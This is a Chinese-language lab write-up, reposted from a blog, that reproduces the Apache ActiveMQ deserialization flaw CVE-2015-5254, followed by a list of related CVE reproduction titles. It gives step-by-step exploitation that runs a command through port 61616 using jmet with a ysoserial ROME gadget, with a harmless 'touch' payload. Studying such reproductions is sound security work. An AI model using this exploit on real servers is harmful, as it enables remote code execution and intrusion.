Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现
Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现
一、漏洞描述
该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
二、漏洞影响版本
Apache ActiveMQ 5.13.0之前的版本
三、漏洞环境搭建
1、官网下载ActiveMQ 5.11.1版本下载地址:http://activemq.apache.org/download-archives.html
2、解压
3、启动,进入bin目录下,运行./activemq start
查看是否启动成功,./activemq status
4、浏览器访问http://192.168.10.149:8161/,如下图可以看到成功搭建环境
四、漏洞复现
1、 漏洞利用过程如下:
a.构成(使用ysoserial)可执行命令的序列化对象
b.作为一个消息,发送给目标的61616端口
c.访问web管理页面,读取消息,触发漏洞
2、下载jmet的jar文件,下载地址为: https://github.com/matthiaskaiser/jmet,复制到kali的/opt目录下,并在当前目录下创建一个external文件夹。Jmet原理是使用ysoserial生成payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。
3、执行如下命令
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.10.149 61616
4、此时会给目标的ActiveMQ添加一个名为事件的队列,通过访问http://192.168.10.149:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有的消息
5、点击查看这条消息即可触发命令执行
6、此刻查看/tmp/,已经成功创建,说明漏洞利用成功
转载于:https://www.cnblogs.com/yuzly/p/11278073.html
- Apache 提权漏洞(CVE-2019-0211)复现
- Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现
- ActiveMQ 反序列化漏洞(CVE-2015-5254)
- 利用Vulnhub复现漏洞 - ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)测试环境
- 利用Vulnhub复现漏洞 - ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境
- 利用Vulnhub复现漏洞 - Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)
- Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现
- ActiveMQ反序列化漏洞(CVE-2015-5254)
- Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
- Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
- Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
- ActiveMQ反序列化漏洞(CVE-2015-5254)
- Apache HTTP Server HTTP响应分离漏洞(CVE-2016-4975)
- Git漏洞允许任意代码执行(CVE-2018-17456)复现
- SSL/TLS 受诫礼(BAR-MITZVAH)攻击漏洞(CVE-2015-2808)【原理扫描】
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- 安卓序列化漏洞 —— CVE-2015-3525
- CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
- CVE-2015-8660 OverlayFS文件系统权限检查缺陷漏洞
- Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现